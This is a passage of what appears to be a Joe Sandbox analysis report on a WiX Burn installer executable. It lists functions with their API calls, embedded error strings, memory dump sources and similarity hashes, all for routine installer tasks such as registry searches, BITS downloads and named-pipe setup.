Instruction Fuzzy Hash: 5B51923164D222BBDB205F54DC85F567A62AF15B30F208314FAF4AE2E5CBF1E8948790

Function 000CA03E Relevance: 28.2, APIs: 1, Strings: 15, Instructions: 215COMMON

Download Yara Rule

APIs

_MREFOpen@16.MSPDB140-MSVCRT ref: 000CA0B6

Strings

Product or related product not found: %ls, xrefs: 000CA1A1
VersionString, xrefs: 000CA0A6, 000CA131, 000CA147, 000CA15B, 000CA174, 000CA188
Trying per-machine extended info for property '%ls' for product: %ls, xrefs: 000CA148
Failed to get product info., xrefs: 000CA1E3
Trying per-user extended info for property '%ls' for product: %ls, xrefs: 000CA175
State, xrefs: 000CA098
Failed to enumerate related products for upgrade code., xrefs: 000CA0F1
MsiProductSearch failed: ID '%ls', HRESULT 0x%x, xrefs: 000CA24F
Language, xrefs: 000CA09F
Failed to copy upgrade code., xrefs: 000CA116
Failed to format GUID string., xrefs: 000CA0C1
Failed to change value type., xrefs: 000CA21D
AssignmentType, xrefs: 000CA091
Failed to set variable., xrefs: 000CA23C
Unsupported product search type: %u, xrefs: 000CA07E

Memory Dump Source

Source File: 00000000.00000002.1644155778.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000000.00000002.1644121649.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644204685.000000000010B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644230284.000000000012A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644257491.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c0000_24EPV9vjc5.jbxd

Similarity

API ID: Open@16
String ID: AssignmentType$Failed to change value type.$Failed to copy upgrade code.$Failed to enumerate related products for upgrade code.$Failed to format GUID string.$Failed to get product info.$Failed to set variable.$Language$MsiProductSearch failed: ID '%ls', HRESULT 0x%x$Product or related product not found: %ls$State$Trying per-machine extended info for property '%ls' for product: %ls$Trying per-user extended info for property '%ls' for product: %ls$Unsupported product search type: %u$VersionString
API String ID: 3613110473-2134270738
Opcode ID: 0021073188b98f4b30b6731742b5cd8a0298a6b24380a1f6aa1a0299d21bca12
Instruction ID: f2240c3dfb4d73ecb8a2e83667a30e14e56e80da3473e5193b983408784f0daf
Opcode Fuzzy Hash: 0021073188b98f4b30b6731742b5cd8a0298a6b24380a1f6aa1a0299d21bca12
Instruction Fuzzy Hash: BC61C732E4012CBBCB219BA9CD45FDE7BB4EB0A318F244159F944BA291C373DE009752

Function 000CECBE Relevance: 28.2, APIs: 2, Strings: 14, Instructions: 173COMMON

Download Yara Rule

APIs

SysFreeString.OLEAUT32(?), ref: 000CEE4C

Part of subcall function 000C394F: GetProcessHeap.KERNEL32(?,000001C7,?,000C2274,000001C7,00000001,80004005,8007139F,?,?,00100267,8007139F,?,00000000,00000000,8007139F), ref: 000C3960
Part of subcall function 000C394F: RtlAllocateHeap.NTDLL(00000000,?,000C2274,000001C7,00000001,80004005,8007139F,?,?,00100267,8007139F,?,00000000,00000000,8007139F), ref: 000C3967

SysFreeString.OLEAUT32(?), ref: 000CEE04

Strings

SoftwareTag, xrefs: 000CECCD
Failed to get @Regid., xrefs: 000CEE9F
Failed to get software tag count., xrefs: 000CED13
Failed to allocate memory for software tag structs., xrefs: 000CED4B
Failed to get SoftwareTag text., xrefs: 000CEE8B
Failed to get @Path., xrefs: 000CEE95
Regid, xrefs: 000CED9A
Failed to get next node., xrefs: 000CEEB3
Failed to select software tag nodes., xrefs: 000CECEE
Filename, xrefs: 000CED7F
Failed to get @Filename., xrefs: 000CEEA9
registration.cpp, xrefs: 000CED41
Failed to convert SoftwareTag text to UTF-8, xrefs: 000CEE81
Path, xrefs: 000CEDB2

Memory Dump Source

Source File: 00000000.00000002.1644155778.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000000.00000002.1644121649.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644204685.000000000010B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644230284.000000000012A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644257491.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c0000_24EPV9vjc5.jbxd

Similarity

API ID: FreeHeapString$AllocateProcess
String ID: Failed to allocate memory for software tag structs.$Failed to convert SoftwareTag text to UTF-8$Failed to get @Filename.$Failed to get @Path.$Failed to get @Regid.$Failed to get SoftwareTag text.$Failed to get next node.$Failed to get software tag count.$Failed to select software tag nodes.$Filename$Path$Regid$SoftwareTag$registration.cpp
API String ID: 336948655-1068704183
Opcode ID: ba7e1e97921276692356be49775ab43c99b9c546e6a4b8c2258bfcabc9e96a13
Instruction ID: a3c9eed549e467a1dc8e7c40554dbf5c3c0b93ce5cd9a37a3b0e82331ad0fa69
Opcode Fuzzy Hash: ba7e1e97921276692356be49775ab43c99b9c546e6a4b8c2258bfcabc9e96a13
Instruction Fuzzy Hash: 90517135E0176AFBCB25DF98C881FAEBBA9BF04750B10416DF911AB291D7B1DE408790

Function 000D4B2A Relevance: 28.2, APIs: 7, Strings: 9, Instructions: 158sleepfileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,C0000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?), ref: 000D4B84
GetLastError.KERNEL32 ref: 000D4B92
Sleep.KERNEL32(00000064), ref: 000D4BB6

Strings

Failed to allocate name of parent cache pipe., xrefs: 000D4C2B
\\.\pipe\%ls.Cache, xrefs: 000D4C17
feclient.dll, xrefs: 000D4BE9, 000D4C84, 000D4C98, 000D4CDC
Failed to allocate name of parent pipe., xrefs: 000D4B50
Failed to open parent pipe: %ls, xrefs: 000D4BDC
pipe.cpp, xrefs: 000D4BCF, 000D4CD2
\\.\pipe\%ls, xrefs: 000D4B3C
Failed to open companion process with PID: %u, xrefs: 000D4CDE
Failed to verify parent pipe: %ls, xrefs: 000D4BFE

Memory Dump Source

Source File: 00000000.00000002.1644155778.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000000.00000002.1644121649.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644204685.000000000010B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644230284.000000000012A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644257491.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c0000_24EPV9vjc5.jbxd

Similarity

API ID: CreateErrorFileLastSleep
String ID: Failed to allocate name of parent cache pipe.$Failed to allocate name of parent pipe.$Failed to open companion process with PID: %u$Failed to open parent pipe: %ls$Failed to verify parent pipe: %ls$\\.\pipe\%ls$\\.\pipe\%ls.Cache$feclient.dll$pipe.cpp
API String ID: 408151869-3212458075
Opcode ID: 4edd06d7e8e457d1acba44cea870c7ada52c5d70ecdd5d19ed28c59b242671f9
Instruction ID: cf15817ff58b5e2c6e39edd35c96445ff2433ad205c8091725af99db812b0e6b
Opcode Fuzzy Hash: 4edd06d7e8e457d1acba44cea870c7ada52c5d70ecdd5d19ed28c59b242671f9
Instruction Fuzzy Hash: 7541F636D95732BBDB7157A08D46F9E76A4AF10B20F114223FE00BA390D7B59D409AE4

Function 000CF585 Relevance: 28.2, APIs: 1, Strings: 15, Instructions: 152registryCOMMON

Download Yara Rule

APIs

RegCloseKey.ADVAPI32(00000000,00000000,000D04DF,InstallerVersion,InstallerVersion,00000000,000D04DF,InstallerName,InstallerName,00000000,000D04DF,Date,InstalledDate,00000000,000D04DF,LogonUser), ref: 000CF733

Part of subcall function 001014F4: RegSetValueExW.ADVAPI32(00020006,00110D10,00000000,00000001,?,00000000,?,000000FF,00000000,00000000,?,?,000CF335,00000000,?,00020006), ref: 00101527

Strings

Date, xrefs: 000CF6C9
InstalledBy, xrefs: 000CF6A4, 000CF6BD
InstalledDate, xrefs: 000CF6C4, 000CF6DD
Failed to write %ls value., xrefs: 000CF71C
PublishingGroup, xrefs: 000CF667, 000CF67A
ReleaseType, xrefs: 000CF68A, 000CF68F, 000CF69E
InstallerName, xrefs: 000CF6E4, 000CF6E9, 000CF6EA, 000CF6FA
Failed to create the key for update registration., xrefs: 000CF5D3
LogonUser, xrefs: 000CF6A9
PackageVersion, xrefs: 000CF61F, 000CF632
InstallerVersion, xrefs: 000CF701, 000CF706, 000CF707, 000CF717
Failed to get the formatted key path for update registration., xrefs: 000CF5A7
ThisVersionInstalled, xrefs: 000CF5DF, 000CF5F2
Publisher, xrefs: 000CF63F, 000CF652
PackageName, xrefs: 000CF5FF, 000CF612

Memory Dump Source

Source File: 00000000.00000002.1644155778.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000000.00000002.1644121649.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644204685.000000000010B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644230284.000000000012A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644257491.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c0000_24EPV9vjc5.jbxd

Similarity

API ID: CloseValue
String ID: Date$Failed to create the key for update registration.$Failed to get the formatted key path for update registration.$Failed to write %ls value.$InstalledBy$InstalledDate$InstallerName$InstallerVersion$LogonUser$PackageName$PackageVersion$Publisher$PublishingGroup$ReleaseType$ThisVersionInstalled
API String ID: 3132538880-2703781546
Opcode ID: 2facbea328aab68d217593ce5e3f62be2ed56c4374d80e0c186fd2df4d54f413
Instruction ID: fedff95a95f6d846e32140ecc41a0cbd5351d496fdfb6ad2dca9041df12c07c0
Opcode Fuzzy Hash: 2facbea328aab68d217593ce5e3f62be2ed56c4374d80e0c186fd2df4d54f413
Instruction Fuzzy Hash: 5741A671A84666F7CF279754CD02FFF7A669B10B10F150278F900F62A2CBB19E60A6C5

Function 000DE7B4 Relevance: 28.1, APIs: 11, Strings: 5, Instructions: 137registryCOMMON

Download Yara Rule

APIs

TlsSetValue.KERNEL32(?,?), ref: 000DE7FF
RegisterClassW.USER32(?), ref: 000DE82B
GetLastError.KERNEL32 ref: 000DE836
CreateWindowExW.USER32(00000080,00119E54,00000000,90000000,80000000,00000008,00000000,00000000,00000000,00000000,?,?), ref: 000DE89D
GetLastError.KERNEL32 ref: 000DE8A7
UnregisterClassW.USER32(WixBurnMessageWindow,?), ref: 000DE945

Strings

Failed to register window., xrefs: 000DE864
uithread.cpp, xrefs: 000DE85A, 000DE8CB
Failed to create window., xrefs: 000DE8D5
Unexpected return value from message pump., xrefs: 000DE930
WixBurnMessageWindow, xrefs: 000DE824, 000DE940

Memory Dump Source

Source File: 00000000.00000002.1644155778.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000000.00000002.1644121649.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644204685.000000000010B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644230284.000000000012A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644257491.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c0000_24EPV9vjc5.jbxd

Similarity

API ID: ClassErrorLast$CreateRegisterUnregisterValueWindow
String ID: Failed to create window.$Failed to register window.$Unexpected return value from message pump.$WixBurnMessageWindow$uithread.cpp
API String ID: 213125376-288575659
Opcode ID: 24f5c9c385b92e2bd73c202b89193b6abfc0b003dca4e420a4d9e55726cd2d54
Instruction ID: 67a810fa93b4fc0be964164143c6d7b9327641cd49eff1029ce259edbcab801b
Opcode Fuzzy Hash: 24f5c9c385b92e2bd73c202b89193b6abfc0b003dca4e420a4d9e55726cd2d54
Instruction Fuzzy Hash: C541B672901315ABDB249BA0DC84ADEBFB8FF04750F204126F958BE280DB71A941DBB1

Function 000EC774 Relevance: 26.5, APIs: 1, Strings: 14, Instructions: 272COMMON

Download Yara Rule

Strings

Failed to allocate space for burn payload inside of related bundle struct, xrefs: 000EC9E7
Failed to copy install arguments for passthrough bundle package, xrefs: 000ECA62
Failed to copy local source path for passthrough pseudo bundle., xrefs: 000EC9B7
Failed to copy related arguments for passthrough bundle package, xrefs: 000ECA82
Failed to copy cache id for passthrough pseudo bundle., xrefs: 000ECA05
Failed to allocate space for burn package payload inside of passthrough bundle., xrefs: 000EC7B4
Failed to copy key for passthrough pseudo bundle., xrefs: 000EC988
pseudobundle.cpp, xrefs: 000EC7A8, 000EC9A1, 000EC9DB
Failed to recreate command-line arguments., xrefs: 000ECA43
Failed to copy uninstall arguments for passthrough bundle package, xrefs: 000ECAAC
Failed to copy download source for passthrough pseudo bundle., xrefs: 000EC98F
Failed to allocate memory for pseudo bundle payload hash., xrefs: 000EC9AD
Failed to copy filename for passthrough pseudo bundle., xrefs: 000EC9BE
Failed to copy key for passthrough pseudo bundle payload., xrefs: 000EC9C5

Memory Dump Source

Source File: 00000000.00000002.1644155778.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000000.00000002.1644121649.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644204685.000000000010B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644230284.000000000012A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644257491.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c0000_24EPV9vjc5.jbxd

Similarity

API ID: Heap$AllocateProcess
String ID: Failed to allocate memory for pseudo bundle payload hash.$Failed to allocate space for burn package payload inside of passthrough bundle.$Failed to allocate space for burn payload inside of related bundle struct$Failed to copy cache id for passthrough pseudo bundle.$Failed to copy download source for passthrough pseudo bundle.$Failed to copy filename for passthrough pseudo bundle.$Failed to copy install arguments for passthrough bundle package$Failed to copy key for passthrough pseudo bundle payload.$Failed to copy key for passthrough pseudo bundle.$Failed to copy local source path for passthrough pseudo bundle.$Failed to copy related arguments for passthrough bundle package$Failed to copy uninstall arguments for passthrough bundle package$Failed to recreate command-line arguments.$pseudobundle.cpp
API String ID: 1357844191-115096447
Opcode ID: 40f74cd46dbd646947bc190bd76a52c385ad254600b03ecef50032ccc249d965
Instruction ID: f43078cd87c4488f09886a31a441737e85520fab087f97cdb7481262d8a2f923
Opcode Fuzzy Hash: 40f74cd46dbd646947bc190bd76a52c385ad254600b03ecef50032ccc249d965
Instruction Fuzzy Hash: F0B16B35600656EFDB11DF25C881F99BBA1BF08710F158269FD14AF352C772E862DB90

Function 000EDE46 Relevance: 26.5, APIs: 2, Strings: 13, Instructions: 204stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,?,?,?,?,?,00000000,?,?,?,?,00000000,00000000), ref: 000EDE61

Strings

Failed to create BITS job callback., xrefs: 000EDF74
Failed to set callback interface for BITS job., xrefs: 000EDF99
Failed to initialize BITS job callback., xrefs: 000EDF82
Failed to download BITS job., xrefs: 000EDFF8
Failed to complete BITS job., xrefs: 000EE00B
Failed to set credentials for BITS job., xrefs: 000EDF0F
Failed to copy download URL., xrefs: 000EDEA8
Failed to create BITS job., xrefs: 000EDEF0
Failed to add file to BITS job., xrefs: 000EDF2E
bitsengine.cpp, xrefs: 000EDE77, 000EDF6A
Invalid BITS engine URL: %ls, xrefs: 000EDE83
Failed while waiting for BITS download., xrefs: 000EE012
Falied to start BITS job., xrefs: 000EE019

Memory Dump Source

Source File: 00000000.00000002.1644155778.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000000.00000002.1644121649.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644204685.000000000010B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644230284.000000000012A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644257491.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c0000_24EPV9vjc5.jbxd

Similarity

API ID: lstrlen
String ID: Failed to add file to BITS job.$Failed to complete BITS job.$Failed to copy download URL.$Failed to create BITS job callback.$Failed to create BITS job.$Failed to download BITS job.$Failed to initialize BITS job callback.$Failed to set callback interface for BITS job.$Failed to set credentials for BITS job.$Failed while waiting for BITS download.$Falied to start BITS job.$Invalid BITS engine URL: %ls$bitsengine.cpp
API String ID: 1659193697-2382896028
Opcode ID: f64f2cbcd5eccdeef7363d5d12503c2474a40fb69e6e28d9c48b4160ee7c0cd4
Instruction ID: be17263e11def87bf51dad2c8fe2778ebc789954d0e7019fe18d173f462b0565
Opcode Fuzzy Hash: f64f2cbcd5eccdeef7363d5d12503c2474a40fb69e6e28d9c48b4160ee7c0cd4
Instruction Fuzzy Hash: 08611935A012A9EFCB229F95D885E5E7BB4EF08710B114156FC04BF352D7B1DD509B90

Function 000E69D2 Relevance: 26.4, APIs: 8, Strings: 7, Instructions: 153serviceCOMMON

Download Yara Rule

APIs

OpenSCManagerW.ADVAPI32(00000000,00000000,000F003F,?,?,00000000,?,?,?,?,?,?,?,?,000E6F28,?), ref: 000E6A0B
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,000E6F28,?,?,?), ref: 000E6A18
OpenServiceW.ADVAPI32(00000000,wuauserv,00000027,?,?,?,?,?,?,?,?,000E6F28,?,?,?), ref: 000E6A60
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,000E6F28,?,?,?), ref: 000E6A6C
QueryServiceStatus.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,000E6F28,?,?,?), ref: 000E6AA6
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,000E6F28,?,?,?), ref: 000E6AB0
CloseServiceHandle.ADVAPI32(00000000), ref: 000E6B67
CloseServiceHandle.ADVAPI32(?), ref: 000E6B71

Strings

Failed to open WU service., xrefs: 000E6A9A
Failed to open service control manager., xrefs: 000E6A46
wuauserv, xrefs: 000E6A5A
Failed to query status of WU service., xrefs: 000E6ADE
Failed to mark WU service to start on demand., xrefs: 000E6B38
Failed to read configuration for WU service., xrefs: 000E6B17
msuengine.cpp, xrefs: 000E6A3C, 000E6A90, 000E6AD4

Memory Dump Source

Source File: 00000000.00000002.1644155778.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000000.00000002.1644121649.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644204685.000000000010B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644230284.000000000012A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644257491.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c0000_24EPV9vjc5.jbxd

Similarity

API ID: Service$ErrorLast$CloseHandleOpen$ManagerQueryStatus
String ID: Failed to mark WU service to start on demand.$Failed to open WU service.$Failed to open service control manager.$Failed to query status of WU service.$Failed to read configuration for WU service.$msuengine.cpp$wuauserv
API String ID: 971853308-301359130
Opcode ID: 4308f39e24c59b2145be719cba55e8d39931e0da8a7d7c9b058e1dfefb996e11
Instruction ID: a8dc1b1802f53c576a190e0329ced9014e7c38d6ab767282a5db923c90408dbc
Opcode Fuzzy Hash: 4308f39e24c59b2145be719cba55e8d39931e0da8a7d7c9b058e1dfefb996e11
Instruction Fuzzy Hash: C341C472E40365AFD7219BA6AC85EAFB7E4AF14750F058035FD11FB241EB72DC408AA1

Function 000D3B4E Relevance: 24.6, APIs: 5, Strings: 9, Instructions: 130COMMON

Download Yara Rule

APIs

GetTempPathW.KERNEL32(00000104,?,?,00000000,crypt32.dll), ref: 000D3BA2
GetLastError.KERNEL32(?,00000000,crypt32.dll), ref: 000D3BAC
GetCurrentProcessId.KERNEL32(?,?,?,00000104,?,?,00000000,crypt32.dll), ref: 000D3C15
ProcessIdToSessionId.KERNEL32(00000000,?,00000000,crypt32.dll), ref: 000D3C1C
CompareStringW.KERNEL32(00000000,00000000,?,?,?,?,?,7FFFFFFF,?,?,?,?,?,00000000,crypt32.dll), ref: 000D3CA6

Strings

Failed to format session id as a string., xrefs: 000D3C4A
Failed to get temp folder., xrefs: 000D3BDA
crypt32.dll, xrefs: 000D3B61
Failed to get length of temp folder., xrefs: 000D3C06
4Mw, xrefs: 000D3BA2
Failed to get length of session id string., xrefs: 000D3C71
Failed to copy temp folder., xrefs: 000D3CCF
%u\, xrefs: 000D3C36
logging.cpp, xrefs: 000D3BD0

Memory Dump Source

Source File: 00000000.00000002.1644155778.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000000.00000002.1644121649.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644204685.000000000010B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644230284.000000000012A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644257491.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c0000_24EPV9vjc5.jbxd

Similarity

API ID: Process$CompareCurrentErrorLastPathSessionStringTemp
String ID: 4Mw$%u\$Failed to copy temp folder.$Failed to format session id as a string.$Failed to get length of session id string.$Failed to get length of temp folder.$Failed to get temp folder.$crypt32.dll$logging.cpp
API String ID: 2407829081-2352143114
Opcode ID: 3a604a749e0f0e16f2a6f0b607f724da8b55d8da6c7c63e42f4b2f7fba023f90
Instruction ID: 66a0e63327fecd8c2924120dd9b5769105e296c11987e0815b00390b24d36290
Opcode Fuzzy Hash: 3a604a749e0f0e16f2a6f0b607f724da8b55d8da6c7c63e42f4b2f7fba023f90
Instruction Fuzzy Hash: 0E416372D8523EABCB219B509C49FDE7778AB14710F1001A6F918B7241EB719F858BE1

Function 000CA28B Relevance: 22.9, APIs: 4, Strings: 9, Instructions: 138registryCOMMON

Download Yara Rule

APIs

_MREFOpen@16.MSPDB140-MSVCRT ref: 000CA2B3
_MREFOpen@16.MSPDB140-MSVCRT ref: 000CA30E
RegQueryValueExW.ADVAPI32(000002C0,00000100,00000000,000002C0,00000000,00000000,000002C0,?,00000100,00000000,?,00000000,?,000002C0,000002C0,?), ref: 000CA32F
RegCloseKey.ADVAPI32(00000000,00000100,00000000,000002C0,00000100,00000000,000002C0), ref: 000CA405

Strings

Failed to open registry key. Key = '%ls', xrefs: 000CA3C7
search.cpp, xrefs: 000CA360
RegistrySearchExists failed: ID '%ls', HRESULT 0x%x, xrefs: 000CA3DD
Failed to format value string., xrefs: 000CA319
Registry value not found. Key = '%ls', Value = '%ls', xrefs: 000CA37A
Failed to query registry key value., xrefs: 000CA36A
Failed to set variable., xrefs: 000CA3BD
Registry key not found. Key = '%ls', xrefs: 000CA396
Failed to format key string., xrefs: 000CA2BE

Memory Dump Source

Source File: 00000000.00000002.1644155778.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000000.00000002.1644121649.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644204685.000000000010B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644230284.000000000012A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644257491.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c0000_24EPV9vjc5.jbxd

Similarity

API ID: Open@16$CloseQueryValue
String ID: Failed to format key string.$Failed to format value string.$Failed to open registry key. Key = '%ls'$Failed to query registry key value.$Failed to set variable.$Registry key not found. Key = '%ls'$Registry value not found. Key = '%ls', Value = '%ls'$RegistrySearchExists failed: ID '%ls', HRESULT 0x%x$search.cpp
API String ID: 2702208347-46557908
Opcode ID: f6986caba95fbc2df07757d912b992e6e72d233ca5fa8207e8bfccf88c71cebb
Instruction ID: 1cf04f7265710e28821aaa165bd14e791fa0fed2f56c60e8ad7a3314ed65ba9a
Opcode Fuzzy Hash: f6986caba95fbc2df07757d912b992e6e72d233ca5fa8207e8bfccf88c71cebb
Instruction Fuzzy Hash: D941F832E4012CBBDB225B95CC4AFAEBBA4EB05714F104259FD44B61D2D7B29F10E791

Function 000CB208 Relevance: 22.9, APIs: 2, Strings: 11, Instructions: 137COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,00000000,00000000,?,000CBAFB,00000008,?,00000000,00000000,?,?,?,00000000,7765C3F0,00000000), ref: 000CB210
GetLastError.KERNEL32(?,000CBAFB,00000008,?,00000000,00000000,?,?,?,00000000,7765C3F0,00000000), ref: 000CB21C

Strings

Bundle guid didn't match the guid in the PE Header in memory., xrefs: 000CB39B
section.cpp, xrefs: 000CB240, 000CB271, 000CB29C, 000CB305, 000CB326, 000CB34F, 000CB38F
Failed to get module handle to process., xrefs: 000CB24A
Failed to read section info, data to short: %u, xrefs: 000CB314
burn, xrefs: 000CB2EB
Failed to find Burn section., xrefs: 000CB332
Failed to find valid NT image header in buffer., xrefs: 000CB2A8
Failed to find valid DOS image header in buffer., xrefs: 000CB27D
.wixburn, xrefs: 000CB2BE
Failed to read section info, unsupported version: %08x, xrefs: 000CB35E
.wix, xrefs: 000CB2E3

Memory Dump Source

Source File: 00000000.00000002.1644155778.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000000.00000002.1644121649.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644204685.000000000010B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644230284.000000000012A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644257491.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c0000_24EPV9vjc5.jbxd

Similarity

API ID: ErrorHandleLastModule
String ID: .wix$.wixburn$Bundle guid didn't match the guid in the PE Header in memory.$Failed to find Burn section.$Failed to find valid DOS image header in buffer.$Failed to find valid NT image header in buffer.$Failed to get module handle to process.$Failed to read section info, data to short: %u$Failed to read section info, unsupported version: %08x$burn$section.cpp
API String ID: 4242514867-926796631
Opcode ID: d75145c4c936b357ddbd41e72385b95000da8f6bfb7b1bc2205afca68bbfe865
Instruction ID: 933d0dc17333b829add75b688a2c690b09c3c5f974db4c6ac2b384679a093b2e
Opcode Fuzzy Hash: d75145c4c936b357ddbd41e72385b95000da8f6bfb7b1bc2205afca68bbfe865
Instruction Fuzzy Hash: 30411736280320A7C7311B918C87F6F7695AB85B31F75852DF9816F1C2DBE5C94282E5

Function 000C694B Relevance: 22.9, APIs: 6, Strings: 7, Instructions: 133libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,ntdll,?), ref: 000C699B
GetLastError.KERNEL32 ref: 000C69A5
GetProcAddress.KERNEL32(?,RtlGetVersion), ref: 000C69E8
GetLastError.KERNEL32 ref: 000C69F2
FreeLibrary.KERNEL32(00000000,00000000,?), ref: 000C6B03

Strings

Failed to get OS info., xrefs: 000C6A43
RtlGetVersion, xrefs: 000C69DD
Failed to locate NTDLL., xrefs: 000C69D3
Failed to locate RtlGetVersion., xrefs: 000C6A20
ntdll, xrefs: 000C6995
variable.cpp, xrefs: 000C69C9, 000C6A16
Failed to set variant value., xrefs: 000C6AE7

Memory Dump Source

Source File: 00000000.00000002.1644155778.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000000.00000002.1644121649.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644204685.000000000010B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644230284.000000000012A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644257491.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c0000_24EPV9vjc5.jbxd

Similarity

API ID: ErrorLast$AddressFreeHandleLibraryModuleProc
String ID: Failed to get OS info.$Failed to locate NTDLL.$Failed to locate RtlGetVersion.$Failed to set variant value.$RtlGetVersion$ntdll$variable.cpp
API String ID: 3057421322-109962352
Opcode ID: 7136fd64a4879b29ed23e2fd3b04cc9ae0f89a2f10b94c494615cb1c8141506d
Instruction ID: f1024dd6a9b45e72d43e1d7f23ad8ae1d9da0cae7060d6e2641b6f99080441fc
Opcode Fuzzy Hash: 7136fd64a4879b29ed23e2fd3b04cc9ae0f89a2f10b94c494615cb1c8141506d
Instruction Fuzzy Hash: 9A41A472D412399BDB319B659C45FEE7AE4EB08710F004199F948B6181EBB68E90CED1

Function 000C48EF Relevance: 22.9, APIs: 6, Strings: 7, Instructions: 130memorysynchronizationCOMMON

Download Yara Rule

APIs

